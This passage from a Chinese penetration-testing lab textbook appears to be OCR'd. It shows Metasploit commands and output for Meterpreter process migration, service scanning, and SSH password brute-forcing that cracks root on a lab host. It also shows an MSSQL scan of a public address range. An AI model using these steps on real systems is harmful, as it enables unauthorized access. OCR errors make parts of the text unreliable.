© 选择 ID Jy 1 的 控制 会 话 端口 。 


msf exploit (handler) »sessions- il 
[* ] Starting interfation with 1l  ... 


(20) 可 以 看 出 ,已 经 进入 Meterpreter f. Fifi 9l H Meterpreter 控制 主机 的 进程 


列表 。 


meterpreter> ps 

设置 后 的 Meterpreter 控制 主机 的 进程 列表 如 下 。 

Process list 

PID Name Arch Session User Path 

0 [System Process] 


1036 svchost.exe x86 ONT AUTHORITYNSYSTEM C:\WINDOWS\ System32 svchost.exe 


2980 AcrcRd32.exe x86 0 DH CA8822AB9589\ Administrator C:\Program Files\ 
Adobe\ Reader 9.0\\Reader \AcroRd32.exe 

320 explorer.exe x86 0  DH- CA8822AB9599\Administrator C:\WINDOWS\ 
Explorer.EXE 


(21) 可 以 看 到 PID 为 2980 的 AcroRd32. exe 进程 和 下 面 PID Jy 320 AY explorer. exe 
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进程 。 此 时 输入 下 面 的 命令 ,将 攻击 载荷 迁移 到 explorer. exe 进程 上 。 
meterpreter> migrate 320 
设置 后 将 攻击 载荷 迁移 到 explorer. exe 进程 显示 如 下 。 


[* ] Migrating to 320.. 
[* ] Migrating campleted successfully. 


可 以 看 出 ,Meterpreter 攻击 载荷 已 经 迁移 到 explorer. exe 进程 上 了 。 
实验 报告 要 求 

。 写 明 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 


。 阐述 碰 到 的 问题 以 及 解决 方法 。 
o 闸 述 收获 与 体会 。 
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第 11 音 网 络 服务 扫描 实验 


11.1 常用 的 扫描 服务 模块 


很 多 网 络 服务 都 是 漏洞 频 发 的 高 危 对 象 ,对 网 络 上 的 特定 服务 进行 扫描 ,往往 能 少 走 弯 
路 ,增加 渗透 成 功 的 概率 。 确 定 开放 端口 后 ,对 相应 端口 上 运行 服务 的 信息 进行 更 深入 的 挖 
掘 通常 称 为 服务 查 点 。 

在 Metasploit 的 Scanner 辅助 模块 中 有 很 多 用 于 服务 扫描 和 查 点 的 工具 ,这 些 工具 通 
W EA [service name]. version 和 [service_name]_login 命名 。 

[service name] version 可 用 于 遍历 网 络 中 包含 了 某 种 服务 的 主机 ,并 进一步 确定 服务 
的 版 本 。[Lservice_name] login 可 对 某 种 服务 进行 口令 探测 攻击 。 

例如 ,http_version 可 用 于 查找 网 络 中 的 Web 服务 器 ,并 确定 服务 器 的 版 本 号 ,http_ 
login 可 用 于 对 需要 身份 认证 的 HTTP 应 用 进行 口令 探测 。 

当然 ,在 Metasploit 中 并 非 所 有 的 模块 都 按照 这 种 命名 规范 进行 开发 ,如 用 于 查找 
Microsoft SQL Server 服务 的 mssql_ping 模块 等 。 


11.1.1 Telnet 服务 扫描 


Telnet 协议 是 TCP/IP 协议 族 中 的 一 员 ,是 Internet 远程 登录 服务 的 标准 协议 和 主要 
方式 。 它 为 用 户 提供 了 在 本 地 计算 机 上 完成 远程 主机 工作 的 能 力 。 在 终端 使 用 者 的 计算 机 
上 使 用 Telnet 程序 ,用 它 连接 到 服务 器 。 终 端 使 用 者 可 以 在 Telnet 程序 中 输入 命令 ,这 些 
命令 会 在 服务 器 上 运行 ,就 像 直 接 在 服务 器 的 控制 台 上 输入 一 样 。 在 本 地 就 可 以 控制 服务 
器 。 要 开始 一 个 Telnet 会 话 ,必须 输入 用 户 名 和 密码 登录 服务 器 。Telnet 是 常用 的 远程 控 
制 Web 服务 器 的 方法 。 

由 于 Telnet 没有 对 传输 的 数据 进行 加 密 , 越 来 越 多 的 管理 员 渐 渐 使 用 更 安全 的 SSH 
协议 代替 它 。 但 是 ,很 多 有 旧版 的 网 络 设备 不 支持 SSH 协议 ,而 且 管 理 员 通常 不 愿 冒 风险 
升级 他 们 重要 设备 的 操作 系统 ,所 以 网 络 上 很 多 有 交换 机 、 路 由 器 ,甚至 防火 墙 仍然 使 用 
Telnet。 一 个 有 趣 的 现象 是 ,价格 昂贵 、 使 用 寿命 更 长 的 大 型 交换 机 使 用 Telnet 协议 的 可 
能 性 会 更 大 ,而 此 类 交换 机 在 网 络 中 的 位 置 一 般 都 非常 重要 。 当 渗透 进入 一 个 网 络 时 ,不 妨 
扫描 一 下 是 否 有 主机 或 设备 开启 了 Telnet 服务 ,为 下 一 步 进行 网 络 嗅 探 或 口令 猜测 做 好 
准备 。 


11.1.2 SSH 服务 扫描 


SSH 为 Secure Shell 的 缩写 ,由 IETF 的 网 络 工作 小 组 Cnetwork working group) 制 

定 ;SSH 为 建立 在 应 用 层 和 传输 层 基础 上 的 安全 协议 。SSH 是 目前 较 可 靠 , 专 为 远程 登录 

会 话 和 其 他 网 络 服务 提供 安全 性 的 协议 。 利 用 SSH 协议 可 以 有 效 防 止 远程 管理 过 程 中 的 

信息 泄露 问题 。SSH 最 初 是 UNIX 系统 上 的 一 个 程序 ,后 来 又 迅速 扩展 到 其 他 操作 平台 。 
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SSH 在 正确 使 用 时 可 弥补 网 络 中 的 漏洞 。SSH 客户 端 适用 于 多 种 平台 ,几乎 所 有 UNIX 
平台 一 一 包括 HP-UX, Linux, AIX, Solaris, Digital UNIX, IRIX, 以 及 其 他 平台 ,都 可 运 
fi SSH, 

SSH 是 类 UNIX 系统 上 最 常见 的 远程 管理 服务 ,与 Telnet 不 同 的 是 , 它 采 用 了 安全 的 
加 密 信息 传输 方式 。 通 常 ,管理 员 会 使 用 SSH 对 服务 器 进行 远程 管理 ,服务 器 会 向 SSH 客 
户 端 返回 一 个 远程 的 Shell 连接 。 如 果 没 有 做 其 他 的 安全 增强 配置 (如 限制 管理 登录 的 IP 
地 址 ) ,只 要 获取 服务 器 的 登录 口令 ,就 可 以 使 用 SSH. 客户 端 登录 服务 器 , 那 就 相当 于 获得 
了 相应 登录 用 户 的 所 有 权限 。 


11.1.3 SSH 口令 猜测 


在 前 面 的 实验 中 使 用 Metasploit 中 的 ssh. version 模块 扫描 到 目标 网 店 范围 内 开放 的 
SSH 服务 的 主机 , 接 下 来 尝试 使 用 Metasploit 中 的 ssh_login 模块 对 SSH 服务 进行 口令 试 
探 攻 击 。 

进行 口令 攻击 前 ,需要 一 个 好 用 的 用 户 名 和 口令 字典 。 这 个 从 网 上 都 能 找到 很 多 ,不 
过 ,在 使 用 之 前 ,需要 注意 Windows 和 Linux 系统 下 文件 编码 的 区 别 , 和 否则 会 导致 加 载 口令 
字典 出 错 。 

载 和 人 ssh_login 模块 后 ,首先 需要 设置 RHOSTS 参数 指定 口令 攻击 的 对 象 , 可 以 是 一 
^ IP 地 址 ,或 一 段 IP 地 址 ,同样 也 可 以 使 用 CIDR 表示 的 地 址 区 段 ,然后 使 用 
USERNAME 参数 指定 一 个 用 户 名 (或 者 使 用 USER_FILE 参数 指定 一 个 包含 多 个 用 户 名 
的 文本 文件 ,每 个 用 户 名 占 一 行 ), 并 使 用 PASSWORD 指定 一 个 特定 的 口令 字符 串 ( 或 者 
使 用 PASS_FILE 参数 指定 一 个 包含 多 个 口令 的 字典 文件 ,每 个 口令 占 一 行 ), 也 可 以 使 用 
USERPASS FILE 指定 一 个 用 户 名 和 口令 的 配对 文件 (用 户 名 和 口令 之 间 用 空格 隔 开 ,每 
对 用 户 名 口令 占 一 行 )。 上 默认 情况 下 ,ssh_login 模块 还 会 尝试 空 口令 ,以 及 与 用 户 名 相同 的 
弱 口 令 进行 登录 测试 。 


11.1.4 数据 库 服 务 查 点 


1. Microsoft SQL Server 数据 库 

Microsoft SQL Server 是 一 个 关系 数据 库 管理 系统 。 它 最 初 是 由 Microsoft, Sybase 和 
Ashton-Tate 3 家 公司 共同 开发 的 ,于 1988 年 推出 了 第 一 个 OS/2 版 本 。 在 Windows NT 
推出 后 , Microsoft 与 Sybase 在 SQL Server fi) JF A E HEAP 38 12 88 T . Microsoft 将 SQL 
Server 移植 到 Windows NT 系统 上 ,专注 于 开发 推广 SQL Server 的 Windows NT 版 本 。 
Sybase 则 较 专 注 于 SQL Server 在 UNIX 操作 系统 上 的 应 用 。 

Microsoft SQL Server 具有 使 用 方便 、 可 伸缩 性 好 ,与 相关 软件 集成 程度 高 等 优点 ,可 
跨越 从 运行 Microsoft Windows 98 的 膝 上 型 计算 机 到 运行 Microsoft Windows 2012 的 大 
型 多 处 理 器 的 服务 器 等 多 种 平台 使 用 。 

Microsoft SQL Server 是 一 个 全 面 的 数据 库 平 台 , 使 用 集成 的 商业 智能 (BI) 工 具 提 供 
了 企业 级 的 数据 管理 。Microsoft SQL Server 数据 库 引 擎 为 关系 型 数据 和 结构 化 数据 提供 
了 更 安全 可 靠 的 存储 功能 ,使 用 户 可 以 构建 和 管理 用 于 业务 的 高 可 用 和 高 性 能 的 数据 应 用 
程序 。 
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各 种 网 络 数据 库 的 网 络 服务 端口 是 漏洞 频 发 的 “ 重 灾区 ”, Microsoft SQL Server 的 
1433 端口 即 为 其 中 一 个 。 可 以 使 用 Metasploit 中 的 mssql_ ping 模块 查找 网 络 中 的 
Microsoft SQL Server。 

2. Oracle 数据 库 

Oracle 数据 库 系 统 是 美国 Oracle 公司 (甲骨 文 ) 提 供 的 以 分 布 式 数据 库 为 核心 的 一 组 
软件 产品 ,是 目前 最 流行 的 客户 /服务 器 (Client/Server) 或 B/S 体系 结构 的 数据 库 之 一 。 例 
如 ,SilverStream 就 是 基于 数据 库 的 一 种 中 间 件 。Oracle 数据 库 是 目前 世界 上 使 用 最 为 广 
泛 的 数据 库 管理 系统 ,作为 一 个 通用 的 数据 库 系统 , 它 具 有 完整 的 数据 管理 功能 ;作为 一 个 
关系 数据 库 , 它 是 一 个 完备 关系 的 产品 ;作为 分 布 式 数据 库 , 它 实现 了 分 布 式 处 理 功能 。 但 
它 的 所 有 知识 只 要 在 一 种 机 型 上 学 习 了 Oracle 知识 , 便 能 在 各 种 类 型 的 机 器 上 使 用 它 。 

可 以 使 用 tnslsnr_version 模块 查找 网 络 中 开放 端口 的 Oracle 监听 器 服务 。 


11.2 网 络 服务 扫描 实验 


实验 器 材 


Metasploit 工具 ,1 套 。 
PC,1 台 。 


实验 任务 

扫描 当前 机 器 的 网 络 服务 。 

实验 环境 

一 台 安 装 了 Metasploit 的 计算 机 。 
预备 知识 


(1) Telnet 服务 的 相关 知识 。 
(2) SSH 服务 的 相关 知识 。 
(3) 数据 库 的 相关 知识 。 


实验 步 又 


1. Telnet version 模块 
CD 通过 use 命令 使 用 telnet. version 模块 。 


msf> use auxiliary/scanner/telnet/telnet version 
(2) 通过 show 命令 查看 模块 的 设置 选项 。 
msf auxiliary(telnet version)» show options 

通过 show 命令 查看 模块 设置 选项 如 下 。 


Module options (auxiliary/scanner/telnet/telnet version): 
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PASSWORD no The password for the specified username 
REORT 23 yes The target port 

THREADS 1 yes The number of concurrent threads 
TIMEDUT 30 yes Timeout for the Telnet probe 

USERNAME no The username to authenticate as 


其 中 ,Name 表示 需要 设置 的 选项 的 名 称 ,Current 表示 该 选项 目前 默认 的 设置 值 , Setting 
表示 是 否 进行 了 设置 ,Required 表示 该 选项 是 否 必须 设置 ,yes 表示 必须 进行 设置 ,而 no d 
示 可 以 设置 ,也 可 以 不 设置 。Description 表示 对 选项 的 介绍 。 

上 述 最 重要 的 选项 是 RHOSTS, 即 目标 地 址 范围 或 CIDR 标识 符 , 也 就 是 要 扫描 的 地 
址 范围 设置 。 

(3) 使 用 set 命令 设置 目标 地 址 范围 。 

msf auxiliary(telnet version)? set rhosts 10.10.10.0/24 

设置 后 界面 中 的 显示 如 下 。 

rhosts- » 10.10.10.0/24 

(4) 使 用 set 命令 设置 并 发 线程 的 数量 。 

msf auxiliary(telnet version)» set threads 100 

设置 后 界面 中 的 显示 如 下 。 

threads= > 100 

(5) 使 用 run 命令 执行 扫描 。 

msf auxiliary(telnet version)? run 

设置 扫描 范围 扫描 后 的 结果 如 下 。 


[* ] Scanned 064 of 256 hosts (025% camplete) 
[* ] Scanned 075 of 256 hosts (02% corplete) 
[* ] Scanned 105 of 256 hosts (041% camplete) 
[* ] Scanned 106 of 256 hosts (041% camplete) 
[* ] Scanned 157 of 256 hosts (061% oamplete) 
[* ] Scanned 164 of 256 hosts (064% complete) 
[* ] Scanned 195 of 256 hosts (076% camplete) 
[* ] Scanned 206 of 256 hosts (080% complete) 
[* ] 10.10.10.254:23 TELNET Ubuntu 8.04\xametasploitable login: 
[* ] Scanned 252 of 256 hosts (098% camplete) 
[* ] Scanned 256 of 256 hosts (100% camplete) 
[* ] Auxiliary module execution campleted 


可 以 看 出 ,IP 地 址 为 10. 10. 10. 254( 自 己 搭建 的 网 络 ) 的 主机 ( 即 网 关 服 务 器 ) 开 放 了 
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Telnet 服务 ,通过 返回 的 服务 旗 标 Ubuntu 8. 04\x0ametasploitable login: 可 以 进一步 确认 
出 这 台 主 机 的 操作 系统 版 本 为 Ubuntu 8. 04, 而 主机 名 为 metasploitable。 

2. SSH version 模块 

CD 通过 use 命令 使 用 ssh_version 模块 。 


ms 他 use auxiliary/scanner/ssh/ssh version 
(2) 通过 show 命令 查看 模块 的 设置 选项 。 
查看 结果 如 下 。 


Module options (auxiliary/scanner/ssh/ssh version): 


RHOSTS yes The target address range or CITR identifier 
RRT 2 yes The target port 

THREADS 1 yes The nnter of concurrent threads 

TIMOUT 30 yes Timeout for the SSH probe 


Ii] telnet. version 模块 相同 ,ssh_version 扫描 模块 的 设置 选项 也 包括 Name, Current, 
Setting, Required 和 Description 5 部 分 ,所 表示 的 含义 也 相同 。 这 里 不 过 多 介绍 了 。 
(3) 使 用 set 命令 设置 目标 地 址 范围 。 


msf auxiliary(ssh version)? set rhosts 10.10.10.0/24 
(4) 使 用 set 命令 设置 并 发 线程 的 数量 。 
msf auxiliary (ssh_version)> set threads 100 

(5) 使 用 run 命令 执行 扫描 。 

msf auxiliary (ssh_version)> run 

对 设置 扫描 范围 扫描 后 的 结果 如 下 。 


[* ] Scanned 051 of 256 hosts (01% camplete) 

[* ] Scanned 073 of 256 hosts (028% camplete) 

[* ] Scanned 104 of 256 hosts (040% complete) 

[* ] 10.10.10.129:22, SSH server version: SSH- 2.0- OpenSSH 5.3pl Debian- 3ubuntu4 
[* ] Scanned 110 of 256 hosts (042% omplete) 

[* ] Scanned 140 of 256 hosts (054% omplete) 

[* ] Scanned 155 of 256 hosts (060% campllete) 

[* ] 10.10.10.254:22, SSH server version: SSH- 2.0- OpenSSH 4.7pl Debian- Subuntul 
[* ] Scanned 196 of 256 hosts (076% camplete) 

[* ] Scanned 205 of 256 hosts (080% omplete) 

[* ] Scanned 242 of 256 hosts (094% camplete) 

[* ] Scanned 256 of 256 hosts (100% complete) 

[* ] Auxiliary module execution camleted 


从 结果 可 以 看 出 ,使 用 Metasploit 中 的 ssh. version 辅助 模块 很 快 在 设置 的 网 络 范围 中 
e AT x 


定位 了 两 台 开 放 SSH 服务 的 主机 ,分 别 是 10. 10. 10. 129( 网 站 服务 器 ) 和 10. 10. 10. 254 CI] 
关 服 务 器 ) ,并 且 显 示 了 SSH 服务 软件 及 具体 的 版 本 号 。 有 了 这 些 信息 ,就 可 以 通过 查询 等 
方式 得 到 相应 版 本 号 的 一 些 基 本 信息 及 漏洞 信息 ,为 之 后 进一步 操作 提供 可 能 。 

3. SSH login 模块 

CD 通过 use 命令 使 用 ssh. login 模块 。 

msf> use auxiliary/scanner/ssh/ssh login 

(2) 通过 show 命令 查看 模块 的 设置 选项 。 

msf auxiliary(ssh login)> show aptions 

查看 结果 如 下 所 示 。 

Module options (auxiliary/scanner/ssh/ssh login): 


Name Current Setting Required Description 

BLANK PASSWORDS tue no Try blank passwords for all users 

BRUTEFORCE SPEED 5 yes How fast to bruteforoe, fram 0 to 5 

PASSWORD no A specific password to authenticate 
with 

PASS FIIE no File omtaining passwords, ane per 
line 

RHOSIS yes The target actress range or CIR 

REORT 22 yes The target port 

STOP ON SUCCESS false yes Stop guessing when a credential 
works for a host 

‘THREADS 1 yes The mnber of concurrent threads 

USERNAME, no A specific usema to 
authenticate as 

USERPASS FILE no File containing users and passwords 
separated by space, ane pair per line 

USER AS PASS true no Ty the usermare as the password for 
all users 

USER FIIE no File omtaining usemares, ane per 
line 

‘VERBOSE tne yes Whether to print output for all 
attenpts 


与 前 面相 比 ,ssh_login 模块 用 到 的 设置 项 多 了 很 多 。 下 面 进行 简单 的 介绍 。 
BLANK_PASSWORDS, 也 就 是 空白 密码 的 意思 , 即 前 面 讲 到 的 先 默认 对 空白 密码 进 
行 验证 。 
BRUTEFORCE_SPEED, 暴 力 破解 的 速度 ,从 0—5 可 选 。 
PASSWORD, 即 准备 暴力 破解 使 用 的 密码 ,虽然 不 是 必需 的 ,但 是 没有 进行 暴力 破解 
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的 密码 ,模块 在 验证 完 空 密码 后 就 停止 了 ,因此 这 个 其 实 是 必须 设置 的 。 

PASS_FILE, 即 准备 暴力 破解 使 用 的 密码 文件 ,PASSWORD 是 指定 单个 密码 ,而 
PASS_FILE 则 是 将 密码 字典 放 到 一 个 文件 里 ,并 且 每 行 只 能 放置 一 个 密码 。 

STOP_ON_SUCCESS, 即 如 果 得 到 主机 正在 工作 的 消息 , 则 停止 试探 密码 ,一般 设置 
为 false。 

USERNAME, [i] PASSWORD 一 样 ,虽然 要 求 不 是 必须 指定 ,但 是 在 实际 使 用 中 是 需 
要 指定 的 。 

USERPASS_FILE, 是 同时 存储 了 密码 和 用 户 名 的 口令 字典 文件 。 每 行 包括 一 个 用 户 
名 和 对 应 的 一 个 密码 ,中间 用 一 个 空格 分 隔 开 。 

USER_AS_PASS ,将 所 用 用 户 名 作为 它 的 密码 进行 猜测 。 这 在 实际 使 用 中 很 有 用 , 因 
为 经 常 有 些 安全 意识 薄弱 的 管理 员 这 样 设置 密码 。 

USER_FILE, 存 储 试探 用 户 名 的 文件 ,同样 每 行 一 个 用 户 名 。 

VERBOSE, 是 否 在 窗口 输出 所 有 的 尝试 情况 ,默认 是 输出 的 。 

在 口令 猜测 时 明显 需要 设置 的 项 或 者 说 可 以 设置 的 项 变 得 多 了 很 多 ,这 就 需要 根据 实 
际 情况 进行 设置 。 

根据 上 次 实验 的 结果 ,选取 10. 10. 10. 254。 

(3) 使 用 set 命令 设置 目标 地 址 范围 。 


msf auxiliary(ssh login)» set rhosts 10.10.10.254 


(4) 使 用 set 命令 设置 参数 username 的 值 。 
这 里 仅 尝试 用 户 名 为 root 的 情况 ,因此 代码 如 下 。 
msf auxiliary(ssh login)» set username root 
(5) 使 用 set 命令 设置 参数 pass file 的 值 。 
将 名 称 为 words. txt 的 密码 字典 放 在 桌面 ,因此 代码 如 下 。 
msf auxiliary(ssh login)» set pass file /root/Desktop/words.txt 
(6) 使 用 set 命令 设置 并 发 线程 的 数量 。 
msf auxiliary(ssh login)» set threads 100 
(7) 使 用 run 命令 执行 扫描 。 
msf auxiliary(ssh login)? run 
得 到 的 结果 如 下 所 示 。 
[* ] 10.10.10.254:22 SSH - Starting bruteforce 
[* ] 10.10.10.254:22 SSH - [01/17] - Trying: username: 'root' with password: '' 
[E ] 10.10.10.254:22 SSH - [01/17] - Failed: 'root':'" 
[* ] 10.10.10.254:22 SSH - [02/17] - Trying: username: 'root' with password: 'root' 
[- ] 10.10.10.254:22 SSH - [02/17] - Failed: 'root':'root" 
[* ] 10.10.10.254:22 SSH - [03/17] - Trying: username: 'root' with password: 
"majordan" 
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[- ] 10.10.10.254:22 SSH - [03/17] - Failed: 'root':'majordam* 

[* ] 10.10.10.254:22 SSH - [04/17] - Trying: username: 'root' with password: 
"malcolm' 

[- ] 10.10.10.254:22 SSH - [04/17] - Failed: 'root': 'malcolm" 

[* ] 10.10.10.254:22 SSH - [05/17] - Trying: username: 'root' with password: 
margaret 

[- ] 10.10.10.254:22 SSH - [05/17] - Failed: 'root': 'margaret' 

[* ] 10.10.10.254:22 SSH - [06/17] - Trying: username: 'root' with password: 
"marilyn' 

[- ] 10.10.10.254:22 SSH - [06/17] - Failed: 'root': 'marilyn' 

[* ] 10.10.10.254:22 SSH - [07/17] - Trying: username: 'root' with password: 


[7 ] 10.10.10.254:22 SSH - [07/17] - Failed: 'root': 'mariposa' 

[* ] 10.10.10.254:22 SSH - [08/17] - Trying: username: 'root' with password: 
‘marlboro' 

[7 ] 10.10.10.254:22 SSH - [08/17] - Failed: 'root': 'marlboro' 

[* ] 10.10.10.254:22 SSH - [09/17] - Trying: username: 'root' with password: 
‘marshal' 

[7 ] 10.10.10.254:22 SSH - [09/17] - Failed: 'root': 'marshal' 

[* ] 10.10.10.254:22 SSH - [10/17] - Trying: username: 'root' with password: 
"maryjane" 

[7 ] 10.10.10.254:22 SSH - [10/17] - Failed: 'root': 'maryjane' 

[* ] 10.10.10.254:22 SSH - [11/17] - Trying: username: 'root' with password: 
"masters' 

[7 ] 10.10.10.254:22 SSH - [11/17] - Failed: 'root': 'masters' 

[* ] 10.10.10.254:22 SSH - [12/17] - Trying: username: 'root' with password: 
"matthew" 

[7 ] 10.10.10.254:22 SSH - [12/17] - Failed: 'root': 'matthew' 

[* ] 10.10.10.254:22 SSH - [13/17] - Trying: username: 'root' with password: 
"maurice" 

[- ] 10.10.10.254:22 SSH - [13/17] - Failed: 'root': 'maurice' 

[* ] 10.10.10.254:22 SSH - [14/17] - Trying: username: 'root' with password: 
"maveric' 

[- ] 10.10.10.254:22 SSH - [14/17] - Failed: 'root': 'maveric" 

[* ] 10.10.10.254:22 SSH - [15/17] - Trying: username: 'root' with password: 
"maverick" 

[- ] 10.10.10.254:22 SSH - [15/17] - Failed: 'root': 'maverick' 

[* ] 10.10.10.254:22 SSH - [16/17] - Tying: username: 'root' with password: 'ubuntu' 
[* ] Command shell session 2 opened (10.10.10.130:50199 — > 10.10.10.254:22) at. 2016- 05- 03 03:32:43 - 0400 
[+] 10.10.10.254:22 SSH - [16/17] - Success: 'root':'ubuntu' 'uid- 0 (root) gid- 0 (root) groups- 0 (root) 
Linux metasploitable 2.6.24- 16- server # 1 SMP Thu Apr 10 13:58:00 UIC 2008 i686 GNU/Linux ' 
[* ] Scanned 1 of 1 hosts (100% camplete) 

[* ] Auxiliary module execution campleted 


可 以 看 到 ,在 第 16 次 尝试 下 ,终于 破解 了 目标 站 点 SSH 服务 的 账号 和 密码 ,username: 
‘root' with password; ubuntu。 因 为 没有 设置 VERBOSE 的 值 ,所 以 默认 将 所 有 的 尝试 情 
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况 进行 了 输出 。 
4. mssql_ping 模块 
CD 通过 use 命令 使 用 mssql_ping 模块 。 


msf> use auxiliary/scanner/mssql/mssql ping 
(2) 通过 show 命令 查看 模块 的 设置 选项 。 


msf auxiliary (mssql ping)» show options 


查看 结果 如 下 。 
Module options (auxiliary/scanner/mssql/mssql ping): 
Name Current Setting Required Description 
PASSWORD no The password for the 
specified username 
RHOSTS yes The target address range or 
THREADS 1 yes The number of concurrent threads 
USERNAME sa no The username to authenticate as 
USE WINDOWS AUTHENT false yes Use windows authentification 
(requires DOMAIN option set) 


与 前 面 不 同 的 是 ,在 mssql ping 模块 用 到 了 USERNAME 设置 项 ,这 其 实 与 Microsoft 
SQL Server 安装 时 的 一 个 默认 设置 有 关 。 初 次 安装 服务 器 时 ,会 默认 创建 sa 或 系统 管理 
员 用 户 。 因 此 ,USERNAME 设置 项 的 默认 设置 是 sa, 这 里 也 不 进行 更 改 。 

(3) 使 用 set 命令 设置 目标 地 址 范围 。 


msf auxiliary mssql_ ping)? set RHOSTS 202.118.176.0/24 
(4) 使 用 set 命令 设置 并 发 线程 的 数量 。 

msf auxiliary(mesql ping)» set THREADS 50 

(5) 使 用 run 命令 执行 扫描 。 

msf auxiliary(mesql ping)» run 

设置 扫描 范围 扫描 后 的 结果 如 下 。 


[* ] Scanned 050 of 256 hosts (019% complete) 
[* ] SQL Server information for 202.118.176.67: 


[+] ServerName = HEU- MMER6G2YW 

[+] InstanceName = = MSSQLSERVER 

[t+] IsClustered -No 

[f] | Version =10.0.4000.0 

[+] tcp = 1433 

[t+] np = \\HEU- MMUFAGHS2YW\ pipe\ salNquery 


[* ] Scanned 058 of 256 hosts (022% complete) 
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[* ] Scanned 091. of 256 hosts (035% camplete) 
[* ] SQL Server information for 202.118.176.104: 


E ServerName = GC- SF4FEF3BOFB6 
Et InstanceName =MSSQLSERVER 

[us IsClustered -No 

i+ Version =8.00.194 

G tcp = 1433 

[+ TD = \\GC- 8F4FEFSBOEBE\pipe\ sal \query 
[* ] SQL Server information for 202.118.176.108: 

i+ ServerName =WIN- UBDUOHOGQ7T 

G InstanceName = HRBGRS 

G IsClustered =No 

[t Version = 10.50.1600.1 

[* ] SQL Server infonmation for 202.118.176.124: 

G ServerName =VM27 


p InstanosName =MSSQLSERVER 
[* ] SQL Server information for 202.118.176.121: 


[o ServerName -ZICHA 

[ta InstanoeName =MSSQLSERVER 

G tcp = 49538 

[* ] SQL Server information for 202.118.176.118: 
ServerName = TS- T88TEIOHKIOT 

[ta InstanoeName =MSSQLSERVER 

fea IsClustered =No 

[us Version =8.00.194 

[ IsClustered =No 

[ IsClustered =No 

G tcp = 1433 

[+ np =\\TS- T88TEIOHKTOTNpipeN sql \query 
[us Version =8.00.194 

tt top = 1433 

p np =\\WM127\pipe\sql\query 
i Version =8.00.194 

E teo -1433 

[ug np = \\ZICHA\pipe\sql\query 


[* ] Scanned 141 of 256 hosts (055% oamplete) 
[* ] SQL Server information for 202.118.176.141: 


i ServerName = HRBEUSZC- GKOS2H 

[us InstanceName =MSSQLSERVER 

E IsClustered -No 

E Version =8.00.194 

i top = 1433 

[n np = NNHRBEUSZC- GKOS2HNpipeN sql\query 


[* ] Scanned 142 of 256 hosts (055% camplete) 
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[* ] Scanned 178 of 256 hosts (06% omplete) 

[* ] Scanned 184 of 256 hosts (071% complete) 

[* ] Scanned 222 of 256 hosts (090% omplete) 

[* ] Scanned 241 of 256 hosts (094% omplete) 

[* ] Scanned 256 of 256 hosts (100% omplete) 

[* ] Auxiliary module execution completed 

从 扫描 结果 可 以 看 出 ,在 扫描 的 202. 118. 176. 0 网 络 范围 内 ,mssql_ping 模块 共 搜索 
到 202. 118. 176. 67, 202. 118. 176. 104, 202. 118. 176. 108, 202. 118. 176. 124, 202. 118. 
176. 121, 202. 118. 176. 118, 202. 118. 176. 141 7 处 站 点 的 服务 器 采用 的 是 Microsoft SQL 
Server 服务 器 ,并 分 别 列 出 了 服务 器 名 称 ServerName, 3c br 44 Pk InstanceName (EI 
Microsoft SQL Server 服务 器 ) .是 否 为 集群 服务 器 IsClustered 版 本 号 Version 以 及 TCP 
端口 号 tcp 等 信息 。 

5. tnslsnr_version 模块 


(1) 通过 use 命令 使 用 tnslsnr_version 模块 。 
msf> use auxiliary/scanner/oracle/tnslsnr version 
(2) 通过 show 命令 查看 模块 的 设置 选项 。 
msf auxiliary(tnslsnr version)? show options 

查看 结果 如 下 。 


Module options (auxiliary/scanner/oracle/tnslsnr version): 


RHOSIS yes The target address range or CIDR identifier 
REORT 1521 yes The target port 
THREADS 1 yes The nnter of concurrent threads 


tnslsnr. version 模块 需要 设置 的 选项 更 少 , 也 更 加 简单 。 
(3) 使 用 set 命令 设置 目标 地 址 范围 。 


msf auxiliary(tnslsnr version)? set RHOSTS 10.10.10.0/24 
(4) 使 用 set 命令 设置 并 发 线程 的 数量 。 

msf auxiliary(tnslsnr version)> set THREADS 50 

(5) 使 用 run 命令 执行 扫描 。 

msf auxiliary(tnslsnr version)? run 

扫描 结果 如 下 。 


[* ] Scanned 051 of 256 hosts (01% camplete) 
[* ] Scanned 096 of 256 hosts (037% camplete) 
[* ] Scanned 101 of 256 hosts (03% canplete) 
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[+ ] 10.10.10.130:1521 Oracle - Version: 32- bit Windows: Version 10.2.0.1.0 - Production 

[* ] Scanned 144 of 256 hosts (056% complete) 

[* ] Scanned 148 of 256 hosts (057% canplete) 

[* ] Scanned 182 of 256 hosts (071% canplete) 

[* ] Scanned 194 of 256 hosts (075% canplete) 

[* ] Scanned 232 of 256 hosts (090% canplete) 

[* ] Scanned 241 of 256 hosts (094% oamplete) 

[* ] Scanned 256 of 256 hosts (100% canplete) 

[* ] Auxiliary module execution completed 

可 以 看 出 ,在 选择 扫描 的 网 络 中 发 现 有 一 个 站 点 ( 即 10. 10. 10. 130) 有 开放 使 用 的 
Oracle 数据 库 , 并 且 其 版 本 为 Version 10. 2. 0. 1. 0 - Production, 


实验 报告 要 求 


。 写 明 实 验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阅 述 碰 到 的 问题 以 及 解决 方法 。 
。 Bye S. 
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